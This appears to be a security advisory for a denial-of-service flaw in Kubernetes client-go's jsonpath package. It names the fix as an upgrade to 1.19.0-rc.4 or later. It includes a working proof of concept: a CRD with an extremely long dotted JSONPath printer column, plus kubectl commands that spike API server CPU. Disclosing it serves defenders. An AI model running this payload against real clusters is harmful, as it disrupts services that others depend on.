Denial of Service (DoS) Affecting k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath package, versions <1.19.0-rc.4


0.0
low
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • User Interaction

    Required

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-GOLANG-K8SIOKUBERNETESSTAGINGSRCK8SIOCLIENTGOUTILJSONPATH-597671

  • published

    24 Jul 2020

  • disclosed

    24 Jul 2020

  • credit

    lazydog

How to fix?

Upgrade k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath to version 1.19.0-rc.4 or higher.

Overview

k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is an is a template engine using jsonpath syntax, which can be seen at http://goessner.net/articles/JsonPath/. In addition, it has {range} {end} function to iterate list and slice.

Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.

PoC

  1. kubectl create -f - <<EOF
    apiVersion: apiextensions.k8s.io/v1beta1
    kind: CustomResourceDefinition
    metadata:
    name: foos.example.com
    spec:
    group: example.com
    scope: Namespaced
    names:
      plural: foos
      singular: foo
      kind: Foo
    version: v1
    additionalPrinterColumns:
    - name: FOO
      type: string
      JSONPath: ........................................................................................................................................................................................................
    EOF
    
  2. kubectl create -f - <<EOF
    apiVersion: example.com/v1
    kind: Foo
    metadata:
    name: foo-cr
    spec:
    foo:
      bar:
        baz:
          qux: data
    EOF
    
  3. kubectl get foo

The API server CPU usage significantly increases